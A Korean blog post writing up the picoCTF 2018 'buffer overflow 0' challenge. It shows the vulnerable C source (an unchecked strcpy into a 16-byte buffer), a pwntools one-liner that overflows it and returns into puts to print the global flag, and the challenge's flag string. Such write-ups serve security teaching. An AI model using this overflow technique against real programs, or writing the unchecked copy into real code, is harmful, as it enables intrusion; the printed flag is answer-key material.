제리의 블로그

picoCTF 2018 buffer overflow 0 본문

CTF/pwnable

picoCTF 2018 buffer overflow 0

j3rrry 2018. 9. 30. 09:55 



#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>

#define FLAGSIZE_MAX 64

char flag[FLAGSIZE_MAX];

void sigsegv_handler(int sig) {
  fprintf(stderr, "%s\n", flag);
  fflush(stderr);
  exit(1);
}

void vuln(char *input){
  char buf[16];
  strcpy(buf, input);
}

int main(int argc, char **argv){

  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
    exit(0);
  }
  fgets(flag,FLAGSIZE_MAX,f);
  signal(SIGSEGV, sigsegv_handler);

  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  if (argc > 1) {
    vuln(argv[1]);
    printf("Thanks! Received: %s", argv[1]);
  }
  else
    printf("This program takes 1 argument.\n");
  return 0;
}
argv[1] 을 vuln 함수의 매개변수로 넣는다.
argv[1] 은 strcpy 에 의해 지역변수 buf 로 복사 됨 (BOF)

flag는 전역변수로 0x0804A080 위치에 있습니다.

plt 를 보면 puts 함수가 사용된 것을 알 수가 있으며
이 puts 는 매개변수로 const char* 를 받는다는 것을 우리 모두는 알고 있습니다.
따라서 전역변수 flag를 매개변수로 넘겨주면 출력해줄 것입니다.



$ ./vuln `python -c "from pwn import *;print 'a'*(0x18+4)+p32(0x80484C0)+'bbbb'+p32(0x0804A080)"`
picoCTF{ov3rfl0ws_ar3nt_that_bad_3598a894}
picoCTF{ov3rfl0ws_ar3nt_that_bad_3598a894}


저작자표시

'CTF > pwnable' 카테고리의 다른 글

picoCTF 2018 buffer overflow 3 Binary Exploitation  (0) 2018.10.03
picoCTF 2018 shellcode Binary Exploitation  (0) 2018.09.30
DefCamp CTF 2018 even more lucky Exploit  (0) 2018.09.23
DefCamp CTF 2018 lucky Exploit  (0) 2018.09.23
Nihwk CTF 2018 pwn6 (Frame Pointer Overflow)  (0) 2018.08.28
'CTF/pwnable' Related Articles more
Comments